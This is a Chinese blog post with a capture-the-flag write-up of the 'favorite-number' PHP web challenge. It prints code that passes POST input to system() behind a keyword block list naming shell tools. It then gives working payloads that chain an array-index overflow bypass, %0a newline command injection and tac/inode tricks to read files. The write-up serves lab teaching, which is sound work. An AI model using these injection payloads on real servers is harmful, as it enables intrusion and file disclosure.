攻防世界: web favorite-number

题目剖析

这是一道PHP代码审计题目

 <?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
} 

通过代码审计,可以观察到以下信息:

  • PHP版本5.5.9
  • 存在数组强类型比较
  • 存在过滤num的POST注入
    • ^和$ 匹配字符串开头和结尾
    • /d 匹配数字
    • /i 表示匹配的时候不区分大小写
    • /m 表示多行匹配。
      所以我们可以得出,在进行POST注入num的时候,需要首位一定是数字,并且要绕过多行匹配
  • 黑名单机制

漏洞分析

  • PHP版本5.5存在数组溢出漏洞
    即如果是32位的操作处理,那么数组最大值是232-1=4294967295=1111 1111 1111 1111 1111 1111 1111 1111。如果加1,那么就会变成1 0000 0000 0000 0000 0000 0000 0000 0000,因为是32位,只保留后32位,前面的1将被舍弃,数组重新归零。
    所以按照此题目的 stuff[4294967295]=stuff[0]
    那么就可以重新进行post注入,按照这个强类型比较又要求$stuff[0] != 'admin'
    可以书写payload:stuff[4294967296]=admin&stuff[1]=user
    这样可以绕过第一个if判断
  • num的换行匹配漏洞
    普通换行无法达成命令的注入,可以用%0a进行替代
  • 黑名单机制漏洞
    使用黑名单最大的坏处就是黑名单不全
    可以使用tac实现和cat效果完全相反的反向读取
    可以使用iNode节点读取flag文件

注入payload

所以我们可以分别注入payload为:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als
!image
stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i /
image
stuff[4294967296]=admin&stuff[1]=user&num=123%0atac find / -inum 33043719
image

posted @ 2021-09-06 12:29  Zeker62  阅读(173)  评论(0编辑  收藏  举报